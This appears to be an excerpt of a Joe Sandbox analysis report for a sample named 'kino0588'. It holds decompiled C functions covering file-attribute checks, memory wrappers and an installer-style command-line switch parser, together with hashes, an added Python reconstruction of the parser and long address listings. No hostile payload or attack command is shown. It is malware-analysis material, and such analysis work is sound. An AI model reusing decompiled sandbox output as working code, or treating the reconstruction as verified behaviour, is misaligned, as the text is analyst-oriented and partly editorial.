• Opcode ID: 551ef7f87c154d106f72d0c9832baceb85a56927cbbc079f045b7e896a5c4fba
• Instruction ID: cdf7869d556c9a5f4b773a289d0abd65cf0ab7f182c3ae392afad3a78e239af0
• Opcode Fuzzy Hash: 551ef7f87c154d106f72d0c9832baceb85a56927cbbc079f045b7e896a5c4fba
• Instruction Fuzzy Hash: 3FF01271500B089FCB759FB9CC01A52BBE4AB96365310092E956FD2194DB31A449CBD0
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E001966AE(CHAR* __ecx) {
	unsigned int _t1;

	_t1 = GetFileAttributesA(__ecx); // executed
	if(_t1 != 0xffffffff) { // not INVALID_FILE_ATTRIBUTES: the path exists and is readable
		// bit 4 of the attribute mask is FILE_ATTRIBUTE_DIRECTORY (0x10)
		return !(_t1 >> 4) & 0x00000001;
	} else {
		return 0; // missing or inaccessible path
	}
}

APIs
• GetFileAttributesA.KERNELBASE(?,00194777,?,00194E38,?), ref: 001966B1
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 138b2ab0220a6230543d6b93d167603d340606f698274b623eaa49df22d43a7d
• Instruction ID: 677533e7effcc0405abe257e4df3387e9b52e15896eafb90dc7fbeb2b0588b59
• Opcode Fuzzy Hash: 138b2ab0220a6230543d6b93d167603d340606f698274b623eaa49df22d43a7d
• Instruction Fuzzy Hash: C6B09276626440426E2006356C295562841ABC123A7E81B91F032C05E0CB3EC89AD054
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00194CA0(long _a4) {
	void* _t2;

	// Thin wrapper: a GMEM_FIXED (flags 0) allocation of _a4 bytes, returned as a raw pointer
	_t2 = GlobalAlloc(0, _a4); // executed
	return _t2;
}

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000000,?), ref: 00194CAA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: AllocGlobal
• String ID:
• API String ID: 3761449716-0
• Opcode ID: ce2814afb76e629af24c0755bf0a861a0f51d2e31a18393bcc1a42369b20c212
• Instruction ID: d610969a2d7c6650ab7080568208f53f4440365aaba8031c676ec6162b3da027
• Opcode Fuzzy Hash: ce2814afb76e629af24c0755bf0a861a0f51d2e31a18393bcc1a42369b20c212
• Instruction Fuzzy Hash: 50B0123204420CB7CF001FC6EC09F853F1DEBC4761F580001F60C454508A73946086D7
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
	E00194CC0(void* _a4) {
		void* _t2;

		_t2 = GlobalFree(_a4); // executed
		return _t2;
	}




0x00194cc8
0x00194ccf

APIs
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: FreeGlobal
• String ID:
• API String ID: 2979337801-0
• Opcode ID: 44e2b2ac5e442d997b81313d89e8561afdf80c25c8afa52f4292b1efe38b100e
• Instruction ID: 017e858a4e221428a1650c5ae715a3a465234a944634a0f4517ba6c183ae78c6
• Opcode Fuzzy Hash: 44e2b2ac5e442d997b81313d89e8561afdf80c25c8afa52f4292b1efe38b100e
• Instruction Fuzzy Hash: B8B0123100010CB78F001B46EC088453F1DDBC02607440011F50C414218B33985185C6
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%
	E00195C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
		signed int _v8;
		signed int _v12;
		CHAR* _v265;
		char _v266;
		char _v267;
		char _v268;
		CHAR* _v272;
		char _v276;
		signed int _v296;
		char _v556;
		signed int _t61;
		int _t63;
		char _t67;
		CHAR* _t69;
		signed int _t71;
		void* _t75;
		char _t79;
		void* _t83;
		void* _t85;
		void* _t87;
		intOrPtr _t88;
		void* _t100;
		intOrPtr _t101;
		CHAR* _t104;
		intOrPtr _t105;
		void* _t111;
		void* _t115;
		CHAR* _t118;
		void* _t119;
		void* _t127;
		CHAR* _t129;
		void* _t132;
		void* _t142;
		signed int _t143;
		CHAR* _t144;
		void* _t145;
		void* _t146;
		void* _t147;
		void* _t149;
		char _t155;
		void* _t157;
		void* _t162;
		void* _t163;
		char _t167;
		char _t170;
		CHAR* _t173;
		void* _t177;
		intOrPtr* _t183;
		intOrPtr* _t192;
		CHAR* _t199;
		void* _t200;
		CHAR* _t201;
		void* _t205;
		void* _t206;
		int _t209;
		void* _t210;
		void* _t212;
		void* _t213;
		CHAR* _t218;
		intOrPtr* _t219;
		intOrPtr* _t220;
		signed int _t221;
		signed int _t223;

		_t173 = __ecx;
		_t61 = *0x198004; // 0x21bd9a3c
		_v8 = _t61 ^ _t221;
		_push(__ebx);
		_push(__esi);
		_push(__edi);
		_t209 = 1;
		if(__ecx == 0 || *__ecx == 0) {
			_t63 = 1;
		} else {
			L2:
			while(_t209 != 0) {
				_t67 = *_t173;
				if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
					_t173 = CharNextA(_t173);
					continue;
				}
				_v272 = _t173;
				if(_t67 == 0) {
					break;
				} else {
					_t69 = _v272;
					_t177 = 0;
					_t213 = 0;
					_t163 = 0;
					_t202 = 1;
					do {
						if(_t213 != 0) {
							if(_t163 != 0) {
								break;
							} else {
								goto L21;
							}
						} else {
							_t69 = *_t69;
                                                                                                                                                                                                                                    									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										_t69 = _v272;
                                                                                                                                                                                                                                    										L21:
                                                                                                                                                                                                                                    										_t155 =  *_t69;
                                                                                                                                                                                                                                    										if(_t155 != 0x22) {
                                                                                                                                                                                                                                    											if(_t202 >= 0x104) {
                                                                                                                                                                                                                                    												goto L106;
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                                                    												_t177 = _t177 + 1;
                                                                                                                                                                                                                                    												_t202 = _t202 + 1;
                                                                                                                                                                                                                                    												_t157 = 1;
                                                                                                                                                                                                                                    												goto L30;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											if(_v272[1] == 0x22) {
                                                                                                                                                                                                                                    												if(_t202 >= 0x104) {
                                                                                                                                                                                                                                    													L106:
                                                                                                                                                                                                                                    													_t63 = 0;
                                                                                                                                                                                                                                    													L125:
                                                                                                                                                                                                                                    													_pop(_t210);
                                                                                                                                                                                                                                    													_pop(_t212);
                                                                                                                                                                                                                                    													_pop(_t162);
                                                                                                                                                                                                                                    													return E00196CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                    													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                                                    													_t177 = _t177 + 1;
                                                                                                                                                                                                                                    													_t202 = _t202 + 1;
                                                                                                                                                                                                                                    													_t157 = 2;
                                                                                                                                                                                                                                    													goto L30;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												_t157 = 1;
                                                                                                                                                                                                                                    												if(_t213 != 0) {
                                                                                                                                                                                                                                    													_t163 = 1;
                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                    													_t213 = 1;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												goto L30;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								goto L131;
                                                                                                                                                                                                                                    								L30:
                                                                                                                                                                                                                                    								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                                                    								_t69 = _v272;
                                                                                                                                                                                                                                    							} while ( *_t69 != 0);
                                                                                                                                                                                                                                    							if(_t177 >= 0x104) {
                                                                                                                                                                                                                                    								E00196E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                                                    								asm("int3");
                                                                                                                                                                                                                                    								_push(_t221);
                                                                                                                                                                                                                                    								_t222 = _t223;
                                                                                                                                                                                                                                    								_t71 =  *0x198004; // 0x21bd9a3c
                                                                                                                                                                                                                                    								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                                                    								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                                                    									0x4f0 = 2;
                                                                                                                                                                                                                                    									_t75 = E0019597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									E001944B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                                                    									 *0x199124 = E00196285();
                                                                                                                                                                                                                                    									_t75 = 0;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								return E00196CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                                                    								if(_t213 == 0) {
                                                                                                                                                                                                                                    									if(_t163 != 0) {
                                                                                                                                                                                                                                    										goto L34;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										goto L40;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									if(_t163 != 0) {
                                                                                                                                                                                                                                    										L40:
                                                                                                                                                                                                                                    										_t79 = _v268;
                                                                                                                                                                                                                                    										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                                                    											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                                                    											if(_t83 == 0) {
                                                                                                                                                                                                                                    												_t202 = 0x521;
                                                                                                                                                                                                                                    												E001944B9(0, 0x521, 0x191140, 0, 0x40, 0);
                                                                                                                                                                                                                                    												_t85 =  *0x198588; // 0x0
                                                                                                                                                                                                                                    												if(_t85 != 0) {
                                                                                                                                                                                                                                    													CloseHandle(_t85);
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												ExitProcess(0);
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											_t87 = _t83 - 4;
                                                                                                                                                                                                                                    											if(_t87 == 0) {
                                                                                                                                                                                                                                    												if(_v266 != 0) {
                                                                                                                                                                                                                                    													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                    														goto L49;
                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                    														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                    														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                                                    														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                                                    														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                                                    														_t202 = _t50;
                                                                                                                                                                                                                                    														do {
                                                                                                                                                                                                                                    															_t88 =  *_t183;
                                                                                                                                                                                                                                    															_t183 = _t183 + 1;
                                                                                                                                                                                                                                    														} while (_t88 != 0);
                                                                                                                                                                                                                                    														if(_t183 == _t202) {
                                                                                                                                                                                                                                    															goto L49;
                                                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                                                    															_t205 = 0x5b;
															if(E0019667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E0019667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00195C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00191680(0x198c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E0019667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E0019667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x198a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00195C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x198b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x198a3a;
																}
																E00191680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E0019658A(_t218, 0x104, 0x191140);
																if(E001931E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x198a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x198a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x198a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x198a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x198a38 = 1;
                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                    															goto L50;
                                                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                                                    															_t132 = _t127 - 1;
                                                                                                                                                                                                                                    															if(_t132 == 0) {
                                                                                                                                                                                                                                    																if(_v266 != 0) {
                                                                                                                                                                                                                                    																	if(_v266 != 0x3a) {
                                                                                                                                                                                                                                    																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                                                    																			goto L49;
                                                                                                                                                                                                                                    																		}
                                                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                                                    																		_t201 = _v265;
                                                                                                                                                                                                                                    																		 *0x199a2c = 1;
                                                                                                                                                                                                                                    																		if(_t201 != 0) {
                                                                                                                                                                                                                                    																			_t220 =  &_v265;
                                                                                                                                                                                                                                    																			do {
                                                                                                                                                                                                                                    																				_t220 = _t220 + 1;
                                                                                                                                                                                                                                    																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                                                    																				if(_t142 == 0) {
                                                                                                                                                                                                                                    																					_t143 = 2;
                                                                                                                                                                                                                                    																					 *0x199a2c =  *0x199a2c | _t143;
                                                                                                                                                                                                                                    																					goto L70;
                                                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                                                    																					_t145 = _t142 - 3;
                                                                                                                                                                                                                                    																					if(_t145 == 0) {
                                                                                                                                                                                                                                    																						 *0x198d48 =  *0x198d48 | 0x00000040;
                                                                                                                                                                                                                                    																					} else {
                                                                                                                                                                                                                                    																						_t146 = _t145 - 5;
                                                                                                                                                                                                                                    																						if(_t146 == 0) {
                                                                                                                                                                                                                                    																							 *0x199a2c =  *0x199a2c & 0xfffffffd;
                                                                                                                                                                                                                                    																							goto L70;
                                                                                                                                                                                                                                    																						} else {
                                                                                                                                                                                                                                    																							_t147 = _t146 - 5;
                                                                                                                                                                                                                                    																							if(_t147 == 0) {
                                                                                                                                                                                                                                    																								 *0x199a2c =  *0x199a2c & 0xfffffffe;
                                                                                                                                                                                                                                    																								goto L70;
                                                                                                                                                                                                                                    																							} else {
                                                                                                                                                                                                                                    																								_t149 = _t147;
                                                                                                                                                                                                                                    																								if(_t149 == 0) {
                                                                                                                                                                                                                                    																									 *0x198d48 =  *0x198d48 | 0x00000080;
                                                                                                                                                                                                                                    																								} else {
                                                                                                                                                                                                                                    																									if(_t149 == 3) {
                                                                                                                                                                                                                                    																										 *0x199a2c =  *0x199a2c | 0x00000004;
                                                                                                                                                                                                                                    																										L70:
                                                                                                                                                                                                                                    																										 *0x198a28 = 1;
                                                                                                                                                                                                                                    																									} else {
                                                                                                                                                                                                                                    																										_t209 = 0;
                                                                                                                                                                                                                                    																									}
                                                                                                                                                                                                                                    																								}
                                                                                                                                                                                                                                    																							}
                                                                                                                                                                                                                                    																						}
                                                                                                                                                                                                                                    																					}
                                                                                                                                                                                                                                    																				}
                                                                                                                                                                                                                                    																				_t144 =  *_t220;
                                                                                                                                                                                                                                    																				_t201 = _t144;
                                                                                                                                                                                                                                    																			} while (_t144 != 0);
                                                                                                                                                                                                                                    																		}
                                                                                                                                                                                                                                    																	}
                                                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                                                    																	 *0x199a2c = 3;
                                                                                                                                                                                                                                    																	 *0x198a28 = 1;
                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                    																goto L50;
                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                    																if(_t132 == 0) {
                                                                                                                                                                                                                                    																	goto L98;
                                                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                                                    																	L49:
                                                                                                                                                                                                                                    																	_t209 = 0;
                                                                                                                                                                                                                                    																	L50:
                                                                                                                                                                                                                                    																	_t173 = _v272;
                                                                                                                                                                                                                                    																	if( *_t173 != 0) {
                                                                                                                                                                                                                                    																		goto L2;
                                                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                                                    																		break;
                                                                                                                                                                                                                                    																	}
                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											goto L106;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										L34:
                                                                                                                                                                                                                                    										_t209 = 0;
                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L131;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if( *0x198a2c != 0 &&  *0x198b3e == 0) {
                                                                                                                                                                                                                                    						if(GetModuleFileNameA( *0x199a3c, 0x198b3e, 0x104) == 0) {
                                                                                                                                                                                                                                    							_t209 = 0;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t202 = 0x5c;
                                                                                                                                                                                                                                    							 *((char*)(E001966C8(0x198b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t63 = _t209;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				L131:
                                                                                                                                                                                                                                    			}
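The switch handling in the `_t132 == 0` branch above is easier to follow written out. The following is an added example, the editor's reconstruction of that branch, not code from the sample, from Joe Sandbox or from any library the sample uses; `parse_switch`, `_option_index`, the key names and the treatment of the input as the switch text that starts at `_v267` (leading slash already consumed) are assumptions, and the sample inputs are constructed. Two details follow the decompile literally: the CompareStringA return value is tested only against zero, so as decompiled both a match and a mismatch with "RegServer" reach L49 and clear `_t209` (the reconstruction mirrors that and records the match separately so the difference is visible), and the `_t149 == 0` branch that would set 0x80 in `*0x198d48` is unreachable and therefore omitted.

```python
# Added example: editor's reconstruction of the decompiled switch parser, not
# the sample's own code. Globals are named after the addresses in the decompile;
# parse_switch, _option_index and the key names are assumptions.

def _option_index(ch):
    """CharUpperA(ch) - 0x41: position of the upper-cased option letter relative to 'A'."""
    up = ch.upper()
    if len(up) != 1:            # e.g. 'ß' -> 'SS': not a single character, treat as unknown
        return -1
    return ord(up) - 0x41


def parse_switch(text):
    """Interpret one switch (text starting at _v267, leading '/' or '-' already consumed).

    Returns (ok, state): ok mirrors _t209 (False once the L49 path clears it),
    state holds the three globals the branch writes plus the outcome of the
    "RegServer" comparison, which stays None unless that comparison ran.
    """
    state = {"flags_199a2c": 0, "flags_198d48": 0, "seen_198a28": 0, "is_regserver": None}
    ok = True
    second = text[1:2]                      # _v266: character after the switch letter

    if second == "":                        # _v266 == 0: bare letter, default flags
        state["flags_199a2c"] = 3
        state["seen_198a28"] = 1
        return ok, state

    if second != ":":                       # _v266 != 0x3a: whole text vs "RegServer"
        # CompareStringA(LOCALE_INVARIANT, NORM_IGNORECASE, ...) returns 1/2/3 on
        # success and 0 only on failure; the decompile tests for != 0, so any
        # completed comparison, equal or not, reaches L49 and clears _t209.
        state["is_regserver"] = text.casefold() == "regserver"
        return False, state

    state["flags_199a2c"] = 1               # "X:...": start from 1, then apply the letters
    for ch in text[2:]:                     # from _v265 up to the terminating NUL
        idx = _option_index(ch)
        if idx == 0:                        # 'A'
            state["flags_199a2c"] |= 2
            state["seen_198a28"] = 1        # L70
        elif idx == 3:                      # 'D' (the one letter that does not reach L70)
            state["flags_198d48"] |= 0x40
        elif idx == 8:                      # 'I'
            state["flags_199a2c"] &= ~2
            state["seen_198a28"] = 1
        elif idx == 13:                     # 'N'
            state["flags_199a2c"] &= ~1
            state["seen_198a28"] = 1
        elif idx == 16:                     # 'Q'
            state["flags_199a2c"] |= 4
            state["seen_198a28"] = 1
        else:                               # any other character: _t209 = 0, keep scanning
            ok = False
    return ok, state


if __name__ == "__main__":
    for sample in ("X", "X:adq", "X:in", "X:z", "RegServer", "Foo"):   # constructed inputs
        print(sample, parse_switch(sample))
```

The globals are kept under their decompiled addresses rather than guessed names so that every write in the reconstruction can be matched against a line of the listing; the bit values (2, 4, 1 and 0x40) are the ones the listing shows and carry no further meaning that this excerpt supports.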
[Address column of the report's decompiled-code view, 0x00195c9e to 0x00195d00; the instruction listing it belonged to is not part of this excerpt.]
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195d06
                                                                                                                                                                                                                                    0x00195d06
                                                                                                                                                                                                                                    0x00195d0e
                                                                                                                                                                                                                                    0x00195d10
                                                                                                                                                                                                                                    0x00195d12
                                                                                                                                                                                                                                    0x00195d14
                                                                                                                                                                                                                                    0x00195d15
                                                                                                                                                                                                                                    0x00195d17
                                                                                                                                                                                                                                    0x00195d49
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195d19
                                                                                                                                                                                                                                    0x00195d19
                                                                                                                                                                                                                                    0x00195d1d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195d3f
                                                                                                                                                                                                                                    0x00195d3f
                                                                                                                                                                                                                                    0x00195d4b
                                                                                                                                                                                                                                    0x00195d4b
                                                                                                                                                                                                                                    0x00195d4f
                                                                                                                                                                                                                                    0x00195d8d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195d93
                                                                                                                                                                                                                                    0x00195d93
                                                                                                                                                                                                                                    0x00195d9a
                                                                                                                                                                                                                                    0x00195d9d
                                                                                                                                                                                                                                    0x00195d9e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195d9e
                                                                                                                                                                                                                                    0x00195d51
                                                                                                                                                                                                                                    0x00195d5b
                                                                                                                                                                                                                                    0x00195d72
                                                                                                                                                                                                                                    0x001960fb
                                                                                                                                                                                                                                    0x001960fb
                                                                                                                                                                                                                                    0x00196207
                                                                                                                                                                                                                                    0x0019620a
                                                                                                                                                                                                                                    0x0019620b
                                                                                                                                                                                                                                    0x0019620e
                                                                                                                                                                                                                                    0x00196217
                                                                                                                                                                                                                                    0x00195d78
                                                                                                                                                                                                                                    0x00195d78
                                                                                                                                                                                                                                    0x00195d80
                                                                                                                                                                                                                                    0x00195d83
                                                                                                                                                                                                                                    0x00195d84
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195d84
                                                                                                                                                                                                                                    0x00195d5d
                                                                                                                                                                                                                                    0x00195d5f
                                                                                                                                                                                                                                    0x00195d62
                                                                                                                                                                                                                                    0x00195d68
                                                                                                                                                                                                                                    0x00195d64
                                                                                                                                                                                                                                    0x00195d64
                                                                                                                                                                                                                                    0x00195d64
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195d62
                                                                                                                                                                                                                                    0x00195d5b
                                                                                                                                                                                                                                    0x00195d4f
                                                                                                                                                                                                                                    0x00195d1d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195d9f
                                                                                                                                                                                                                                    0x00195d9f
                                                                                                                                                                                                                                    0x00195da5
                                                                                                                                                                                                                                    0x00195dab
                                                                                                                                                                                                                                    0x00195dba
                                                                                                                                                                                                                                    0x00196218
                                                                                                                                                                                                                                    0x0019621d
                                                                                                                                                                                                                                    0x00196220
                                                                                                                                                                                                                                    0x00196221
                                                                                                                                                                                                                                    0x00196229
                                                                                                                                                                                                                                    0x00196230
                                                                                                                                                                                                                                    0x00196247
                                                                                                                                                                                                                                    0x0019626a
                                                                                                                                                                                                                                    0x00196272
                                                                                                                                                                                                                                    0x00196249
                                                                                                                                                                                                                                    0x00196255
                                                                                                                                                                                                                                    0x0019625f
                                                                                                                                                                                                                                    0x00196264
                                                                                                                                                                                                                                    0x00196264
                                                                                                                                                                                                                                    0x00196284
                                                                                                                                                                                                                                    0x00195dc0
                                                                                                                                                                                                                                    0x00195dc0
                                                                                                                                                                                                                                    0x00195dca
                                                                                                                                                                                                                                    0x00195e22
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195dcc
                                                                                                                                                                                                                                    0x00195dce
                                                                                                                                                                                                                                    0x00195e24
                                                                                                                                                                                                                                    0x00195e24
                                                                                                                                                                                                                                    0x00195e2c
                                                                                                                                                                                                                                    0x00195e47
                                                                                                                                                                                                                                    0x00195e4a
                                                                                                                                                                                                                                    0x001961d2
                                                                                                                                                                                                                                    0x001961e2
                                                                                                                                                                                                                                    0x001961e7
                                                                                                                                                                                                                                    0x001961ee
                                                                                                                                                                                                                                    0x001961f1
                                                                                                                                                                                                                                    0x001961f1
                                                                                                                                                                                                                                    0x001961f8
                                                                                                                                                                                                                                    0x001961f8
                                                                                                                                                                                                                                    0x00195e50
                                                                                                                                                                                                                                    0x00195e53
                                                                                                                                                                                                                                    0x00196109
                                                                                                                                                                                                                                    0x0019611f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00196125
                                                                                                                                                                                                                                    0x00196137
                                                                                                                                                                                                                                    0x0019613a
                                                                                                                                                                                                                                    0x0019613c
                                                                                                                                                                                                                                    0x0019613e
                                                                                                                                                                                                                                    0x0019613e
                                                                                                                                                                                                                                    0x00195e74
                                                                                                                                                                                                                                    0x00195e77
                                                                                                                                                                                                                                    0x00195ea0
                                                                                                                                                                                                                                    0x00195ebd
                                                                                                                                                                                                                                    0x00195f79
